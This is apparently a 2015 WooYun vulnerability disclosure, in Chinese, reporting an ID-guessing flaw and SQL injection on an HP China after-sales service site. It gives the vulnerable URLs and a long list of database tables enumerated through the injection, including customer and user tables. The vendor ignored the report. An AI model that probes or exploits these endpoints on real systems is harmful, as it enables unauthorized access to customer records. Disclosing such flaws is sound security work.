当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133136

漏洞标题:惠普某站上万条客户信息泄漏,SQL注入漏洞(上百库)

相关厂商:惠普

漏洞作者: 0x 80

提交时间:2015-08-10 17:36

修复时间:2015-08-15 17:38

公开时间:2015-08-15 17:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

惠普某站上万条客户信息泄漏,SQL注入漏洞(上百库)

详细说明:

http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00498&id=1

7623.png


ID没有加密
替换即可
http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00497&id=1

7645.png


另外存在SQL注入
上百库

7645.png


6572.png


Table found: ActionTypeList
Table found: APDATA_DOA
Table found: APDATA_HARD
Table found: apdata_hard2
Table found: APDATA_SOFT
Table found: ArcList
Table found: ASC_CallBackList
Table found: ASC_KeyPerson
Table found: ASC_PartReceiver
Table found: ASC3TList
Table found: asc3tlist_beifen20131107
Table found: asc3tlist_beifen20140306
Table found: ASCLIST
Table found: asclist_beifen20150609
Table found: bb
Table found: Blacklist
Table found: BlacklistLog
Table found: Bulletin
Table found: BusinessDOAInfo
Table found: CALL_RESPONSE_REP
Table found: CCC_ASC
Table found: ChinaMap
Table found: CIPSMSNameList
Table found: CIPSMSNAMELIST_beifen
Table found: CITY_BUNDLE
Table found: CloseTAT
Table found: CSO
Table found: CSO_Action
Table found: CSO_CCC
Table found: cso_newasc
Table found: CSO_OOW_Bill
Table found: CSO_SERVICETYPE
Table found: CSO_STATUS
Table found: CSO_TAT
Table found: CSOCaseList
Table found: CSOLOG
Table found: CSOPART
Table found: CSOPART_CCC
Table found: CSOPART_STATUS
Table found: CSOPART_TAT
Table found: CSOPART_USEDTYPE
Table found: CUSTOMER
Table found: CUSTOMER_CCC
Table found: customer0709
Table found: Dispatch_Cso with not part
Table found: Dispatch_Cso with part
Table found: DispatchReport
Table found: DispatchTAT
Table found: DOA
Table found: DOA_REP
Table found: DOA_TAT
Table found: doa_view
Table found: DoaStore
Table found: ENGINEER
Table found: EPLIST
Table found: ExamApplyList
Table found: FA_Type
Table found: GiftNameList
Table found: GiftTypeList
Table found: Group_ASC
Table found: group_asc_beifen20130813
Table found: GSPREIMBURSE
Table found: GSPREIMBURSE_2
Table found: GspReimbuse_OLD
Table found: HDEscalation
Table found: HoliDay
Table found: HP_Newton_EmailList
Table found: HR
Table found: HR_STATUS
Table found: issue
Table found: IssuePath
Table found: ITCaseList
Table found: KTIRegionUser
Table found: LCD_OOW_PRICE
Table found: LOG_OF_RELEASE_ASCINFO
Table found: MailList
Table found: ManualList
Table found: Menu
Table found: menu_beifen20130216
Table found: menuTree
Table found: ONSITE_BENCH
Table found: ONSITE_BENCH_REP
Table found: Part
Table found: PART_CATELOG_COST
Table found: PART_DELIVERY
Table found: PART_ErrorCode
Table found: PART_GOODRMA
Table found: PART_GOODRMA_benfei20121105
Table found: PART_OOW_PRICE
Table found: Part_OOW_SERVICECOST
Table found: part_quantabeifen120321
Table found: PART_RECEIVE
Table found: PART_REQUEST
Table found: PART_RETURN
Table found: PART_SIZE
Table found: partassigntat
Table found: PartHitRateData
Table found: PartPlan
Table found: PartsBill
Table found: PartsGroupValve
Table found: partsgroupValve_beifen120903
Table found: PAVILION_DOA
Table found: PAYTOPL
Table found: PCVISION
Table found: Product
Table found: product_beifen20140609
Table found: Product_part
Table found: ProductODM
Table found: PUBLISH_ASCLIST
Table found: quanta_partn
Table found: recc
Table found: RegionEmailAddr
Table found: Report_PartHitrate
Table found: rma_20121105
Table found: RPList
Table found: RPSTATUS
Table found: SACC_ENGINEER
Table found: Sms_SumaryReport
Table found: SMSList
Table found: SMSOUTList
Table found: SN_Of_LG
Table found: SOM_ActionList
Table found: SpecialProduct
Table found: SSS_Log
Table found: STORE
Table found: STORE_BIZ
Table found: store_ODMdelivery
Table found: Store_WEEKLY
Table found: Storeinit
Table found: storeupdate
Table found: SUPPLIER
Table found: SupportingList
Table found: sysdiagrams
Table found: TAT_ODMtoWHSE
Table found: TAT_PAVILION
Table found: tat_pavilion_beifen20130509
Table found: tat_pavilion_dd
Table found: TitleList
Table found: TSRMOBILELIST
Table found: UserList
Table found: WAREHOUSE
Table found: WHSE_BIN
Table found: WHSE_SP
Table found: whse_sp_beifen121119
Table found: WHSE_SP_beifen20131016XL
Table found: whse_sp_ss
Table found: WHSE_TAT
Table found: WHSELOG
Table found: YSTF_CSOCLOSE_TAT
Table found: YSTF_DISPATCH_TAT
Table found: YSTF_PartApply_TAT
Table found: YSTF_缁撳崟TAT
Table found: YSTF_娲惧崟TAT
Table found: YSTF_閰嶈揣TAT
Table found: zone_pc
Table found: zone_pc_beifen130513new
Table found: zone_pc_beifen130517all
Table found: zone_pc_beifen150424
Table found: zone_pc_beifen150508
Table found: zone_pc_beifen150515
Table found: zone_pc_beifen150522
Table found: zone_pc_beifen150529
Table found: zone_pc_beifen150605
Table found: zone_pc_beifen150612
Table found: zone_pc_beifen150619
Table found: zone_pc_beifen150630
Table found: zone_pc_beifen150701
Table found: zone_pc_beifen150717
Table found: zone_pc_beifen150724
Table found: zone_pc_beifen150731
Table found: zone_pc_beifen150807
Table found: ZoneCharge
Table found: Zoneday


漏洞证明:

http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00498


修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-15 17:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论